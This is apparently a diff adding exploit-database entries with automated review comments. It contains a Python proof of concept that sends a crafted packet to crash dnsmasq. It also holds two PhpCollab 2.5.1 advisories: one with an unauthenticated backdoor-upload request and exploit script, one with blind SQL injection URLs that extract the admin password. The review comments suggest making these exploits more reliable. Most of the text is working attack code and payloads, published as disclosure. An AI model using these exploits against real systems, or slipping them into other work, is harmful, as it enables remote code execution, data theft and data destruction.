+ #3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
+==2215==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+# Fermin J. Serna
+# Felix Wilhelm
+# Gabriel Campana
+# Kevin Hamacher
+# Gynvael Coldwin
+# Ron Bowes - Xoogler :/
+
+import socket
+import sys
+
+def negative_size_param():
+ data = '''00 00 00 00 00 00 00 00 00 00 00 04
+00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
+00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
+08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
+00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
+00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
+f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
+01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
+00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
+13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
+08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
+00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
+00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
+35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
+01 20 00 01
+'''.replace(' ', '').replace('\n', '').decode('hex')
+ return data
+
+if __name__ == '__main__':
+ if len(sys.argv) != 3:
+ print 'Usage: %s ' % sys.argv[0]
+ sys.exit(0)
+
+ ip = sys.argv[1]
+ port = int(sys.argv[2])
+
+ packet = negative_size_param()
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
+ s.sendto(packet, (ip, port))
+ s.close()
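Review bot: `negative_size_param()` returns a few hundred bytes of opaque hex with no indication of which bytes drive the bug; the ASan trace in the header points at `add_pseudoheader` (edns0.c:164) reached from `add_edns0_config` with `size=-4`, so a comment should mark the EDNS0 OPT pseudo-RR inside the blob and the length value whose arithmetic underflows, with the rest labelled as filler. The header already states the bug is only reachable with `--add-mac`, `--add-cpe-id` or `--add-subnet`; repeating that in the usage message (and exiting with `sys.exit(1)` rather than `0` on a bad argument count) makes the PoC self-describing. `.decode('hex')` and the bare `print` make this Python 2 only; `binascii.unhexlify` and `print(...)` would run under both. `SO_BROADCAST` is set although the destination is a user-supplied address, so either the option is dead or the intent to target a broadcast address should be stated.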
diff --git a/platforms/php/webapps/42934.txt b/platforms/php/webapps/42934.txt
new file mode 100755
index 000000000..c2bf6f82b
--- /dev/null
+++ b/platforms/php/webapps/42934.txt
@@ -0,0 +1,123 @@
+# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
+
+## Description
+
+PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
+
+## Arbitrary File Upload
+
+The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
+
+**CVE ID**: CVE-2017-6090
+
+**Access Vector**: remote
+
+**Security Risk**: Critical
+
+**Vulnerability**: CWE-434
+
+**CVSS Base Score**: 10 (Critical)
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept
+
+The following HTTP request allows an attacker to upload a malicious php file, without authentication.
+Thus, a file named after `$id.extension` is created.
+
+For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
+
+```
+POST /clients/editclient.php?id=1&action=update HTTP/1.1
+Host: phpCollab.lan
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
+Content-Length: 252
+
+-----------------------------154934846911423734231554128137
+Content-Disposition: form-data; name="upload"; filename="backdoor.php"
+Content-Type: application/x-php
+
+
+
+-----------------------------154934846911423734231554128137--
+```
+
+
+### Vulnerable code
+
+The vulnerable code is found in `clients/editclient.php`, line 63.
+
+```
+$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
+if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
+{
+ chmod("../logos_clients/".$id.".$extension",0666);
+ $tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
+ connectSql("$tmpquery");
+}
+```
+
+
+### Exploit code
+
+```
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import os
+import sys
+import requests
+
+if __name__ == '__main__':
+ if (len(sys.argv) != 4):
+ print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
+ sys.exit(1)
+
+ target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
+ print("[*] Trying to exploit with URL : %s..." % target)
+ backdoor = {'upload': open(sys.argv[3], 'rb')}
+ r = requests.post(target, files=backdoor)
+ extension = os.path.splitext(sys.argv[3])[1]
+ link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
+ r = requests.get(link)
+ if r.status_code == 200:
+ print("[OK] Backdoor link : %s" % link)
+ else:
+ print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
+```
+
+## Solution
+
+Update to the latest version avalaible.
+
+## Affected versions
+
+* Version <= 2.5.1
+
+## Timeline (dd/mm/yyyy)
+
+* 27/08/2016 : Initial discovery.
+* 05/10/2016 : Initial contact.
+* 11/10/2016 : GPG Key exchange.
+* 19/10/2016 : Advisory sent to vendor.
+* 13/02/2017 : First fixes.
+* 15/02/2017 : Fixes validation by Sysdream.
+* 21/02/2017 : PhpCollab ask to wait before publish.
+* 21/06/2017 : New version has been released.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
+
+--
+SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
\ No newline at end of file
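Review bot: The script in the "Exploit code" section treats any HTTP 200 on `GET /logos_clients/<id><ext>` as proof of a successful upload, but a logo that already exists for that client id (or a catch-all 200 page) returns the same status, and the POST response is overwritten without being inspected; check the POST status first and confirm the fetched body contains a marker from the uploaded file instead of relying on the status alone. The uploaded file handle is never closed and neither request has a `timeout=`; `with open(sys.argv[3], 'rb') as fh: r = requests.post(target, files={'upload': fh}, timeout=10)` fixes both. The multipart body in the raw-request PoC is empty between the `Content-Type: application/x-php` header and the closing boundary — presumably the PHP payload was lost in rendering — so the request cannot be reproduced as shown. The vulnerable-code excerpt also shows `chmod(..., 0666)` on the dropped file and `$id` interpolated unescaped into the UPDATE statement, which look like a second weakness worth calling out alongside CWE-434.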
diff --git a/platforms/php/webapps/42935.txt b/platforms/php/webapps/42935.txt
new file mode 100755
index 000000000..650358455
--- /dev/null
+++ b/platforms/php/webapps/42935.txt
@@ -0,0 +1,120 @@
+# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
+
+## Description
+
+PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
+
+## SQL injections
+
+The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
+
+**CVE ID**: CVE-2017-6089
+
+**Access Vector**: remote
+
+**Security Risk**: Critical
+
+**Vulnerability**: CWE-89
+
+**CVSS Base Score**: 10 (Critical)
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
+
+## Proof of Concept 1
+
+The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
+
+```
+http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
+
+http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `topics/deletetopics.php`, line 9.
+
+```
+if ($action == "delete") {
+ $id = str_replace("**",",",$id);
+ $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
+ $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
+ $pieces = explode(",",$id);
+ $num = count($pieces);
+ connectSql("$tmpquery1");
+ connectSql("$tmpquery2");
+```
+
+
+## Proof of Concept 2
+
+The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
+
+```
+http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
+
+```
+if ($action == "delete") {
+ $id = str_replace("**",",",$id);
+ $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
+ connectSql("$tmpquery1");
+```
+
+
+## Proof of Concept 3
+
+The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
+
+```
+http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
+
+```
+if ($action == "delete") {
+ $id = str_replace("**",",",$id);
+ $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
+ connectSql("$tmpquery1");
+```
+
+**Notes**
+The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
+
+
+## Solution
+
+Update to the latest version avalaible.
+
+## Affected versions
+
+* Version <= 2.5.1
+
+## Timeline (dd/mm/yyyy)
+
+* 27/08/2016 : Initial discovery.
+* 05/10/2016 : Initial contact.
+* 11/10/2016 : GPG Key exchange.
+* 19/10/2016 : Advisory sent to vendor.
+* 13/02/2017 : First fixes.
+* 15/02/2017 : Fixes validation by Sysdream.
+* 21/02/2017 : PhpCollab ask to wait before publish.
+* 21/06/2017 : New version has been released.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
+
+--
+SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
\ No newline at end of file
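Review bot: The CVSS vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H` scores integrity as None, yet every injection point quoted is a `DELETE ... WHERE id = $id` / `WHERE id IN($id)` statement, so `id=1 OR 1=1` removes every topic, post, bookmark or calendar row without authentication; the vector should carry `I:H` and the score be recomputed. Proof of Concept 1 injects through the `project` parameter, but the quoted `topics/deletetopics.php` excerpt only shows `$id` reaching SQL — the query that consumes `project` should be quoted as well, or the excerpt is incomplete. Because the subqueries execute inside a DELETE, any payload whose WHERE clause evaluates true destroys data; the advisory should warn testers of that and state that `SLEEP(5)` and the `0x61646d696e` (`admin`) literal are MySQL-specific. Minor: "vulnerables" → "vulnerable" in the Notes paragraph.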